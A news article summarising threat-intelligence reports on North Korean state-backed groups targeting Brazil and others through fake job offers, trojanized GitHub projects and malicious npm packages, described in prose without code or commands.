Cyber actors associated with North Korea have accounted for approximately one-third of all phishing attempts aimed at Brazil since 2020, reflecting the country’s growing influence and attracting the attention of espionage groups.
According to a recent report from Google’s Mandiant and Threat Analysis Group (TAG), state-backed North Korean actors have set their sights on various sectors within Brazil, including government institutions, aerospace, technology, and financial services.
Similar to their operations in other regions, North Korean groups have shown a particular interest in cryptocurrency and financial technology firms. At least three distinct groups have targeted Brazilian companies operating in these sectors.
One prominent group identified as UNC4899 (also known as Jade Sleet, PUKCHONG, and TraderTraitor) has been actively targeting cryptocurrency professionals with a Trojanized Python application embedded with malware.
Their strategy typically involves initiating contact through social media, sending benign PDF documents posing as job opportunities from reputable cryptocurrency firms. If the recipient shows interest, a follow-up PDF containing a skills assessment and instructions to download a GitHub project is sent.
The GitHub project, disguised as a tool for retrieving cryptocurrency prices, was modified to connect with a domain controlled by the attackers to download a second-stage payload under specific conditions.
According to researchers at Mandiant and TAG, this tactic mirrors previous incidents involving UNC4899, notably the 2023 JumpCloud hack. In July 2023, GitHub reported a social engineering attack targeting employees in blockchain, cryptocurrency, online gambling, and cybersecurity sectors, encouraging them to execute code from a GitHub repository using fake npm packages.
Job-themed social engineering remains a hallmark of North Korean cyber groups. Google also detected a campaign by a group named PAEKTUSAN, posing as recruiters to distribute C++ downloader malware named AGAMEMNON via Microsoft Word attachments in phishing emails.
For instance, PAEKTUSAN created a fake HR account at a Brazilian aerospace company to send phishing emails to another Brazilian aerospace firm’s employees. These activities are consistent with a known operation referred to as Operation Dream Job.
In another campaign, PAEKTUSAN posed as recruiters from a major U.S. aerospace company, contacting professionals in Brazil and other regions through email and social media regarding potential job opportunities.
Google thwarted efforts by another North Korean group named PRONTO, which targeted diplomats with phishing emails related to denuclearization and news updates, tricking them into visiting credential-harvesting pages or disclosing login credentials under the guise of accessing a PDF document.
This revelation follows Microsoft’s disclosure of a previously unknown North Korean threat actor dubbed Moonstone Sleet, focusing on ransomware and espionage attacks against individuals and organizations in software, information technology, education, and defense sectors.
Moonstone Sleet gained attention for distributing malware through counterfeit npm packages on the npm registry, a tactic reminiscent of UNC4899’s approach. However, the specific packages linked to each group exhibit distinct coding styles and structures.
Checkmarx researchers Tzachi Zornstein and Yehuda Gelb noted that Jade Sleet’s packages, observed in mid-2023, were designed in pairs, each published under a separate npm user account to deliver malicious functions. In contrast, packages deployed from late 2023 to early 2024 adopted a single-package approach with increased complexity and targeting Linux systems.
Despite these differences, the overarching strategy exploits developers’ trust in open-source repositories, broadening the potential reach of malicious packages and increasing the likelihood of inadvertent installations.
This latest information underscores the evolving tactics employed by Moonstone Sleet, which initially relied on LinkedIn and freelancer platforms for distributing bogus npm packages.
The findings coincide with the discovery of a new social engineering campaign by the North Korean-linked Kimsuky group, posing as Reuters to target North Korean human rights activists with malware under the guise of an interview request, as reported by Genians.